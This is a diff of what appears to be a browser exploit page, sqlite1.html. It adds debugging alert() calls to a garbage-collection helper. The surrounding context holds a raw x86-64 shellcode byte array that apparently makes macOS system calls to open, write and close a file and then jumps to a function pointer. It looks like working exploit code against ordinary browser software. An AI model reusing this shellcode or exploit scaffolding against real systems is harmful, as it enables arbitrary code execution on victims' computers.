--- a/sqlite1.html
+++ b/sqlite1.html
@@ -4,6 +4,7 @@
 <script type="text/javascript">
 
 function gc() {
+	alert("in gc");
     try {
         var c = document.createElement("canvas");
         var gl = c.getContext("2d");
@@ -14,6 +15,7 @@ function gc() {
     } catch (e) {
 
     }
+	alert("end of gc");
 }
 
 var shellcode = [ 0x48, 0x8D, 0x3D, 0x00, 0x01, 0x00, 0x00, 0x41, 0x57, 0x41, 0x56, 0x49, 0x89, 0xFE, 0x48, 0x81, 0xEC, 0x38, 0x01, 0x00, 0x00, 0x48, 0x89, 0xE7, 0x49, 0x8D, 0x76, 0x30, 0x48, 0x31, 0xC9, 0x8A, 0x04, 0x0E, 0x88, 0x04, 0x0F, 0x48, 0xFF, 0xC1, 0x3C, 0x00, 0x75, 0xF3, 0x48, 0x83, 0xE9, 0x01, 0x48, 0x01, 0xCF, 0x48, 0xC7, 0xC6, 0x00, 0x01, 0x00, 0x00, 0x48, 0xC7, 0xC0, 0x31, 0x00, 0x00, 0x02, 0x0F, 0x05, 0x48, 0x31, 0xC9, 0x8A, 0x04, 0x0F, 0x48, 0xFF, 0xC1, 0x3C, 0x00, 0x75, 0xF6, 0x48, 0x83, 0xE9, 0x01, 0x48, 0x01, 0xCF, 0x49, 0x8D, 0x76, 0x48, 0x48, 0x31, 0xC9, 0x8A, 0x04, 0x0E, 0x88, 0x04, 0x0F, 0x48, 0xFF, 0xC1, 0x3C, 0x00, 0x75, 0xF3, 0x48, 0x89, 0xE7, 0x48, 0xC7, 0xC6, 0x02, 0x06, 0x00, 0x00, 0x48, 0xC7, 0xC2, 0xA4, 0x01, 0x00, 0x00, 0x48, 0xC7, 0xC0, 0x05, 0x00, 0x00, 0x02, 0x0F, 0x05, 0x49, 0x89, 0xC7, 0x48, 0x89, 0xC7, 0x49, 0x8B, 0x36, 0x49, 0x8B, 0x56, 0x08, 0x48, 0xC7, 0xC0, 0x04, 0x00, 0x00, 0x02, 0x0F, 0x05, 0x4C, 0x89, 0xFF, 0x48, 0xC7, 0xC0, 0x06, 0x00, 0x00, 0x02, 0x0F, 0x05, 0x48, 0x89, 0xE7, 0x48, 0xC7, 0xC6, 0x01, 0x00, 0x00, 0x00, 0x49, 0x8B, 0x46, 0x10, 0x48, 0x81, 0xC4, 0x38, 0x01, 0x00, 0x00, 0x41, 0x5F, 0x41, 0x5E, 0x48, 0x81, 0xEC, 0x48, 0x01, 0x00, 0x00, 0xFF, 0xD0 ];
